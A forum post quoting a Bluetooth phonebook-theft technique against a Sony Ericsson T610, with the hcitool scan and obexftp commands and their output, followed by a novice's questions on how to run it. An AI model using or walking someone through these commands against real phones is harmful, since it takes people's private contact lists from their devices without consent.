re: "Only two standard commands are required to steal the Phonebook information from a T610 mobile phone:

# hcitool scan

Scanning .

00:0A:D9:15:0B:1C T610-phone

# obexftp -b 00:0A:D9:15:0B:1C --channel 10 -g telecom/pb.vcf -v

Browsing 00:0A:D9:15:0B:1C ...

Channel: 7

No custom transport

Connecting...bt: 1

done

Receiving telecom/pb.vcf...\done

Disconnecting...done"

1. how would one use the command to retrieve info?

i am new to this area of networking but will understand with a bit more explanation.

2. would it be sent via bluetooth to the second device after applying the "passkey1234" step?

3. will the reply to my request automatically be sent back to my device?

thanks for the tip and i plan to read on...
